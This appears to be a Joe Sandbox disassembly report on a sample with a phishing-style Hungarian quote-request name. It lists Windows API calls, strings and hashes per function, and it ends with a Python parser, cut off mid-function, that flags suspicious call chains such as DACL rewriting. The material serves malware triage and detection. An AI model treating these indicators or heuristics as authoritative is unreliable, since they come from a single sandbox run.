                                                              • VariantInit.OLEAUT32(00000000), ref: 0064AB3D
                                                              • VariantCopy.OLEAUT32(?,?), ref: 0064AB46
                                                              • VariantClear.OLEAUT32(?), ref: 0064AB52
                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0064AC40
                                                              • __swprintf.LIBCMT ref: 0064AC70
                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0064AC9C
                                                              • VariantInit.OLEAUT32(?), ref: 0064AD4D
                                                              • SysFreeString.OLEAUT32(00000016), ref: 0064ADDF
                                                              • VariantClear.OLEAUT32(?), ref: 0064AE35
                                                              • VariantClear.OLEAUT32(?), ref: 0064AE44
                                                              • VariantInit.OLEAUT32(00000000), ref: 0064AE80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                              • API String ID: 3730832054-3931177956
                                                              • Opcode ID: da31e7504c74f80c589aee92ef806a34e565e4abbb93ea5c3a5e10a44e6b8330
                                                              • Instruction ID: b3c2484c6301295a163d4d6000cc352deac495ac416f2e36772e0b0d2e2e13df
                                                              • Opcode Fuzzy Hash: da31e7504c74f80c589aee92ef806a34e565e4abbb93ea5c3a5e10a44e6b8330
                                                              • Instruction Fuzzy Hash: 5BD1ED71A84215FBDB209FA5C885BAEB7B7FF04700F148559E4059B281DB34EC82DBA7
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 006671FC
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00667247
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 80552db48e85864eeffc9d383fe673ed41e9b2a57d54d3b54a91b07ab5d92c7d
                                                              • Instruction ID: d7734e5a075b8a2b90d2028a6e250d01bbb4d4b7b2b776f6886c2138e552c012
                                                              • Opcode Fuzzy Hash: 80552db48e85864eeffc9d383fe673ed41e9b2a57d54d3b54a91b07ab5d92c7d
                                                              • Instruction Fuzzy Hash: 449161702047029BCB48EF20C851AAEB7A7AF54314F04585DF8966B393DF31ED8ADB95
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0063CF50), ref: 0063CE90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: 4+k$CLASS$CLASSNN$H+k$INSTANCE$L+k$NAME$P+k$REGEXPCLASS$T+k$TEXT
                                                              • API String ID: 3555792229-2149024467
                                                              • Opcode ID: de412a8294e627a2c80d5e7ef3eb057ee0c8bce7f794f0fd74428de057f755d5
                                                              • Instruction ID: 5fe3fcfbdd3f9d586ec12e2cb072eff5551a92d004119622fe39418cb2ad9ad9
                                                              • Opcode Fuzzy Hash: de412a8294e627a2c80d5e7ef3eb057ee0c8bce7f794f0fd74428de057f755d5
                                                              • Instruction Fuzzy Hash: 3E91A270600606AACB58EF60C891BEAFB77BF04310F548519F859B7291DF30A99ACBD4
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0066E5AB
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0066BEAF), ref: 0066E607
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066E647
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066E68C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066E6C3
                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0066BEAF), ref: 0066E6CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0066E6DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,0066BEAF), ref: 0066E6EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0066E70B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0066E717
                                                                • Part of subcall function 00620FA7: __wcsicmp_l.LIBCMT ref: 00621030
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 9d56a67b1b503353ad0dfee99a1dc93dabef3490bbb456ddf9a6b45f8a462a79
                                                              • Instruction ID: 5a96cfc16719b8550e7ba2c62af0d9f84d958487b6dcec11fbc955d3269676f0
                                                              • Opcode Fuzzy Hash: 9d56a67b1b503353ad0dfee99a1dc93dabef3490bbb456ddf9a6b45f8a462a79
                                                              • Instruction Fuzzy Hash: AF61E2B1540615BAEB14DF64DC46FFE77BABB18724F104205F911D61D1EB719980CBA0
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • CharLowerBuffW.USER32(?,?), ref: 0064D292
                                                              • GetDriveTypeW.KERNEL32 ref: 0064D2DF
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064D327
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064D35E
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064D38C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1148790751-4113822522
                                                              • Opcode ID: a9b7d98702954143b0ae2e69427499a67265273935d98aaef9f286fad2638748
                                                              • Instruction ID: 83f582d27409ce27d9adfcf6f78423adb04e967583e829652d1d3c64b68c225e
                                                              • Opcode Fuzzy Hash: a9b7d98702954143b0ae2e69427499a67265273935d98aaef9f286fad2638748
                                                              • Instruction Fuzzy Hash: FC517DB1604305AFC744EF20C8819ABB7E6EF98714F10495CF88667291DB31EE45CB92
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00673973,00000016,0000138C,00000016,?,00000016,0069DDB4,00000000,?), ref: 006426F1
                                                              • LoadStringW.USER32(00000000,?,00673973,00000016), ref: 006426FA
                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00673973,00000016,0000138C,00000016,?,00000016,0069DDB4,00000000,?,00000016), ref: 0064271C
                                                              • LoadStringW.USER32(00000000,?,00673973,00000016), ref: 0064271F
                                                              • __swprintf.LIBCMT ref: 0064276F
                                                              • __swprintf.LIBCMT ref: 00642780
                                                              • _wprintf.LIBCMT ref: 00642829
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00642840
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 618562835-2268648507
                                                              • Opcode ID: e0eabae30798b33bca4d1056f0ed2aa533ccfcbd9418fc1956bdcd58097efd20
                                                              • Instruction ID: fbf438aaac387e0d49dc1455b05acda6479efbcc90682a5ef78dfd50d225f825
                                                              • Opcode Fuzzy Hash: e0eabae30798b33bca4d1056f0ed2aa533ccfcbd9418fc1956bdcd58097efd20
                                                              • Instruction Fuzzy Hash: 03417E72840219BACB58FBE0DD96DEFB37AAF14340F500169B502760D2EA706F49CFA5
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0064D0D8
                                                              • __swprintf.LIBCMT ref: 0064D0FA
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0064D137
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0064D15C
                                                              • _memset.LIBCMT ref: 0064D17B
                                                              • _wcsncpy.LIBCMT ref: 0064D1B7
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0064D1EC
                                                              • CloseHandle.KERNEL32(00000000), ref: 0064D1F7
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0064D200
                                                              • CloseHandle.KERNEL32(00000000), ref: 0064D20A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 09c26939085571d9bc28aeadb55c992f0a740fe4f09990bba34a9d1b43209deb
                                                              • Instruction ID: c6c67d313394e31a719c8620173cafc219fd0ec54e1331d6aa728dd63e365b3c
                                                              • Opcode Fuzzy Hash: 09c26939085571d9bc28aeadb55c992f0a740fe4f09990bba34a9d1b43209deb
                                                              • Instruction Fuzzy Hash: CE3160B2900119ABDB21DFA0DC49FEB77BEAF89740F1041BAF609D21A1E77097458B24
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0066BEF4,?,?), ref: 0066E754
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E76B
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E776
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E783
                                                              • GlobalLock.KERNEL32(00000000), ref: 0066E78C
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E79B
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0066E7A4
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E7AB
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E7BC
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0068D9BC,?), ref: 0066E7D5
                                                              • GlobalFree.KERNEL32(00000000), ref: 0066E7E5
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0066E809
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0066E834
                                                              • DeleteObject.GDI32(00000000), ref: 0066E85C
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0066E872
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: cd10562210a66573084aa2e039024dc335170a21d76b5d5e8701d5c13bc0afbf
                                                              • Instruction ID: 70e4f161f04988e66e77fbaee7e5c9dad729e6c1eac173261b7766a45185736c
                                                              • Opcode Fuzzy Hash: cd10562210a66573084aa2e039024dc335170a21d76b5d5e8701d5c13bc0afbf
                                                              • Instruction Fuzzy Hash: 7E410875600208FFDB119F65DC88EAE7BBAEF89725F108168F906D72A0D731AD41DB60
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 0065076F
                                                              • _wcscat.LIBCMT ref: 00650787
                                                              • _wcscat.LIBCMT ref: 00650799
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006507AE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 006507C2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 006507DA
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 006507F4
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00650806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: d5beeffc5586a67507402c595d460c99ce013c4665f3a9a0b71dda6c46b50305
                                                              • Instruction ID: e33433bd950ea51d4be20ee22bbdff1bfbce8ee5dbf2b6722ab5da56e0e67dd6
                                                              • Opcode Fuzzy Hash: d5beeffc5586a67507402c595d460c99ce013c4665f3a9a0b71dda6c46b50305
                                                              • Instruction Fuzzy Hash: CF818F715043019FEB64DF24C8559ABB3EABF88305F18882EFC85C7351E730E9598B92
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0066EF3B
                                                              • GetFocus.USER32 ref: 0066EF4B
                                                              • GetDlgCtrlID.USER32(00000000), ref: 0066EF56
                                                              • _memset.LIBCMT ref: 0066F081
                                                              • GetMenuItemInfoW.USER32 ref: 0066F0AC
                                                              • GetMenuItemCount.USER32(00000000), ref: 0066F0CC
                                                              • GetMenuItemID.USER32(?,00000000), ref: 0066F0DF
                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0066F113
                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0066F15B
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0066F193
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0066F1C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: 9d8efcd6f2e6b69515e5d9bd3a96fac3bfe82f76b501dcb95d7804ee65e278e6
                                                              • Instruction ID: 8944922dbd8dd478d4ec2fd3944a5c20f7ed570b1427416bcacaaff72980820e
                                                              • Opcode Fuzzy Hash: 9d8efcd6f2e6b69515e5d9bd3a96fac3bfe82f76b501dcb95d7804ee65e278e6
                                                              • Instruction Fuzzy Hash: DB81AD75104301EFD710CF15D884AABBBEAFB89354F10492EF99497391D731D945CBA2
                                                              APIs
                                                                • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0063ABD7
                                                                • Part of subcall function 0063ABBB: GetLastError.KERNEL32(?,0063A69F,?,?,?), ref: 0063ABE1
                                                                • Part of subcall function 0063ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0063A69F,?,?,?), ref: 0063ABF0
                                                                • Part of subcall function 0063ABBB: HeapAlloc.KERNEL32(00000000,?,0063A69F,?,?,?), ref: 0063ABF7
                                                                • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0063AC0E
                                                                • Part of subcall function 0063AC56: GetProcessHeap.KERNEL32(00000008,0063A6B5,00000000,00000000,?,0063A6B5,?), ref: 0063AC62
                                                                • Part of subcall function 0063AC56: HeapAlloc.KERNEL32(00000000,?,0063A6B5,?), ref: 0063AC69
                                                                • Part of subcall function 0063AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0063A6B5,?), ref: 0063AC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0063A8CB
                                                              • _memset.LIBCMT ref: 0063A8E0
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0063A8FF
                                                              • GetLengthSid.ADVAPI32(?), ref: 0063A910
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0063A94D
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0063A969
                                                              • GetLengthSid.ADVAPI32(?), ref: 0063A986
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0063A995
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0063A99C
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0063A9BD
                                                              • CopySid.ADVAPI32(00000000), ref: 0063A9C4
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0063A9F5
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0063AA1B
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0063AA2F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: 4f88d2020c1a14e8360758f712930993b26bcde0aa853aa6525824faf7fe0b38
                                                              • Instruction ID: 1166fa74ca8919d7e3f8192f260dfe3dcdc02ab61b648cd2f65749fb57a79691
                                                              • Opcode Fuzzy Hash: 4f88d2020c1a14e8360758f712930993b26bcde0aa853aa6525824faf7fe0b38
                                                              • Instruction Fuzzy Hash: 31512A71900209BFDF10DF94DD85EEEBBBAFF04300F148219E995AA290DB359A05DBA1
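The API listings in these function blocks follow one fixed shape: a bulleted call as `Api.MODULE(args), ref: <call-site address>`, optionally prefixed with `Part of subcall function <addr>:` when the call was lifted from a callee, followed later by the block's `Opcode ID`. The Python below is an added example, not code from the Joe Sandbox report or from the Joe Sandbox IDA plugin; it parses that shape from a constructed excerpt of the listings above (the image-loading block and the DACL-rewriting block) and tags each block by ordered API subsequence. The rule names and the three patterns in `RULES` are this editor's choice of call chains worth a second look when triaging such a report, not Joe Sandbox signatures.

```python
"""Parse the per-function "APIs" listings that Joe Sandbox emits for each
disassembled block (the format seen in this report) and tag each block with
an API-sequence heuristic.  Added example, not code from the report."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed excerpt: two blocks copied in shape from the listings above,
# trimmed to the calls needed for the heuristics below.
SAMPLE = """\
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0066BEF4,?,?), ref: 0066E754
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E79B
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E7BC
• OleLoadPicture.OLEAUT32(?,00000000,00000000,0068D9BC,?), ref: 0066E7D5
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0066E872
Memory Dump Source
• Opcode ID: cd10562210a66573084aa2e039024dc335170a21d76b5d5e8701d5c13bc0afbf
APIs
  • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0063ABD7
  • Part of subcall function 0063AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0063A6B5,?), ref: 0063AC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0063A8CB
• _memset.LIBCMT ref: 0063A8E0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0063A969
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0063AA1B
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0063AA2F
Memory Dump Source
• Opcode ID: 4f88d2020c1a14e8360758f712930993b26bcde0aa853aa6525824faf7fe0b38
"""

# One call line: optional "Part of subcall function <addr>:" prefix, then
# Api.MODULE(args), ref: <addr>.  The argument list is optional (_memset.LIBCMT).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]+)\s*$")


@dataclass
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                 # address of the call site
    subcall: Optional[str]   # callee address when lifted from a subcall, else None


@dataclass
class Block:
    opcode_id: str = ""
    calls: List[Call] = field(default_factory=list)

    def direct(self) -> List[str]:
        """API names called by the block itself (subcall entries excluded), in listing order."""
        return [c.api for c in self.calls if c.subcall is None]

    def modules(self) -> List[str]:
        return sorted({c.module for c in self.calls})


def parse_blocks(text: str) -> List[Block]:
    blocks: List[Block] = []
    cur: Optional[Block] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # each block's call listing opens here
            cur = Block()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = tuple(m["args"].split(",")) if m["args"] is not None else ()
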